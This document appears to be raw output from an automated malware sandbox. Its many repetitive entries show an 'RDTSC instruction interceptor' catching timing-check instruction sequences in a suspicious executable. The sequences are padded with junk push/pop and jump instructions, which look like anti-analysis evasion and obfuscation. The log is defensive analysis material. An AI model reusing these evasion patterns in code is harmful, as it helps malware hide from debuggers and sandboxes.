Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3CF8DC second address: 3CF8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 32E90E second address: 32E914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 32E914 second address: 32E924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4AE0E87EBBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 32E924 second address: 32E929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8531 second address: 3D8538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8538 second address: 3D8558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F4AE04F8891h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8558 second address: 3D8571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE0E87EC3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D7C4A second address: 3D7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D7C53 second address: 3D7C6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F4AE0E87EC6h 0x0000000e jmp 00007F4AE0E87EBAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D7F2E second address: 3D7F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D7F32 second address: 3D7F4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EC4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D80B8 second address: 3D80D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8894h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D823A second address: 3D823F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D823F second address: 3D8245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8245 second address: 3D8251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4AE0E87EB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8251 second address: 3D8259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3D8259 second address: 3D8271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE0E87EC0h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E0456 second address: 3E045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DE5F7 second address: 3DE612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F4AE0E87EB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DE612 second address: 3DE621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DE963 second address: 3DE968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEC49 second address: 3DEC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEC4F second address: 3DEC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEDE9 second address: 3DEDEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEDEF second address: 3DEDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEF89 second address: 3DEF8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEF8F second address: 3DEFA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F4AE0E87EB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DEFA6 second address: 3DEFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DF114 second address: 3DF11E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4AE0E87EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DF11E second address: 3DF124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3DF124 second address: 3DF12A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E8F26 second address: 3E8F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8898h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E8F42 second address: 3E8F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E89E0 second address: 3E89EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4AE04F8886h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E8B22 second address: 3E8B36 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4AE0E87EB8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4AE0E87EB6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3E8B36 second address: 3E8B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3EBDF6 second address: 3EBDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3EBDFA second address: 3EBE1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8899h 0x00000007 ja 00007F4AE04F8886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F6261 second address: 3F6272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE0E87EBBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F6272 second address: 3F627A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F5E0E second address: 3F5E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F5E14 second address: 3F5E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F5E1D second address: 3F5E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3F5E21 second address: 3F5E2B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 400966 second address: 400975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F4AE0E87EB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 400975 second address: 400996 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4AE04F8886h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F4AE04F8891h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 400996 second address: 40099C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31F6CF second address: 31F6D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31F6D5 second address: 31F6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31F6E0 second address: 31F6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 31F6E5 second address: 31F6EF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4AE0E87EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 40F08A second address: 40F08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 40F350 second address: 40F354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 40F354 second address: 40F36A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8892h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 40F36A second address: 40F375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 413D74 second address: 413DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Ch 0x00000007 jnl 00007F4AE04F8886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F4AE04F8893h 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 423C1A second address: 423C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4AE0E87EB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4271D0 second address: 4271DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jbe 00007F4AE04F8886h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4271DE second address: 427232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4AE0E87EBCh 0x0000000e jmp 00007F4AE0E87EBAh 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F4AE0E87EC5h 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F4AE0E87EC5h 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434C55 second address: 434C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AC4 second address: 434AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AC8 second address: 434ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434ACC second address: 434ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F4AE0E87EB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434ADC second address: 434AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AE0 second address: 434AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AE6 second address: 434AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AEC second address: 434AF6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4AE0E87EC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AF6 second address: 434AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434AFC second address: 434B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4AE0E87EC9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434B20 second address: 434B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 434B24 second address: 434B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4AE0E87EBCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 436202 second address: 436206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 436206 second address: 43620C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4392BC second address: 4392C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 439414 second address: 43941A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 43941A second address: 43941E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 43941E second address: 439422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 439422 second address: 439439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jnp 00007F4AE04F88B9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jbe 00007F4AE04F8886h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45255E second address: 45256C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE0E87EBAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45256C second address: 452581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4AE04F888Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 4527FA second address: 4527FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45295B second address: 452961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 452DEA second address: 452E29 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4AE0E87EBFh 0x0000000f jnp 00007F4AE0E87ED0h 0x00000015 jmp 00007F4AE0E87EC4h 0x0000001a jg 00007F4AE0E87EB6h 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 452E29 second address: 452E33 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4AE04F8886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 452E33 second address: 452E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 452FA3 second address: 452FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4AE04F8891h 0x0000000d jmp 00007F4AE04F888Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 452FCA second address: 452FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45328A second address: 453295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F4AE04F8886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 456375 second address: 45637D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45B861 second address: 45B865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45B865 second address: 45B86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45B86B second address: 45B871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45B871 second address: 45B875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45BE4B second address: 45BE4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45BE4F second address: 45BE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F4AE0E87EB6h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F4AE0E87EBAh 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45F332 second address: 45F361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F8897h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f jp 00007F4AE04F8886h 0x00000015 jbe 00007F4AE04F8886h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45F361 second address: 45F36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4AE0E87EB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45F36F second address: 45F394 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F4AE04F8897h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 45F394 second address: 45F398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
